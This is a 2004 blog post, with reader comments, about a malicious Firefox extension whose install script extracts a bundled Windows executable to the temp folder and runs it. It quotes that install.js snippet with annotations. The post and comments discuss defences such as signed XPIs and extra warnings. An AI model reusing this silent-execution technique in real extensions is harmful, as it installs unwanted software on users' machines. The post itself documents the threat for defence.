Malicious XPIs run executable binaries

Flexer recently posted his encounter with a website that tried to get him to install a malicious XPI (Firefox extension). Upon the user clicking “Install”, the install.js (the script inside the XPI that performs the actual installation) extracts the bundled Windows executable from the package and runs it; Paradox52525 reports that the executable is xxxtoolbar.

Here’s a snippet of the code in the install.js:

var xpiSrc = "istinstall_netscape.exe";   // the Windows binary bundled inside the XPI
initInstall("Adding a File",              // initInstall(name, id, version, flags)
            "addFile",
            "1.0.1.7",
            1);
f = getFolder("Temporary");               // stage it in the temp directory, not the profile
setPackageFolder(f);
addFile(xpiSrc);                          // copy the .exe out of the XPI
execute(xpiSrc, "", false);               // ...and run it: no arguments, non-blocking

Arthur_Dent breaks down exactly what the XPI and the contained executable does in his post.

Best solution, to me? Verified and digitally signed XPIs are allowed to run without hindrance. For unverified XPIs, warn the user of that fact, and that the XPI will directly run executable code. Require an extra step of confirmation. That’s what I think at the moment, but there are some pretty good ideas in that thread. It’ll be interesting to see how this is dealt with in the near future.

Follow the discussion on the MozillaZine forums.

Update: See relevant bug 238684.

5 Comments & TrackBacks


“Best solution, to me? Verified and digitally signed XPIs are allowed to run without hindrance.”

Verified by whom? mozilla.org?

Posted by: Jesse Ruderman on March 28, 2004 9am


There should be a team that checks packages that are submitted, if the team finds that the packages are ok then they add the file name and md5 of the file to a database that gets checked by the installer. If the installer can’t find the entry then it should display a warning stating that the package could not be verified and ask them if they want to continue (no should be default).

Posted by: 0zone on March 28, 2004 11am


“Verified by whom? mozilla.org?”

I’d say a good, trusted authority is good enough. The people at mozdev.org, David Tenser, mozilla.org are possible candidates.

Posted by: Cheah Chu Yeow on March 28, 2004 11am


I’m not so sure that David Tenser verifying all the XPIs alone would scale too well. :)

Posted by: Minh Nguyễn on March 29, 2004 10am


Disappointing
A malicious Firefox .XPI was created. I’m just gonna trackback and link you to the blog of a person I know (internet-wise), because his post was very well written. It will be fixed by the Mozilla development project somehow, but…

Posted by: Dark Reflexions on March 29, 2004 11pm
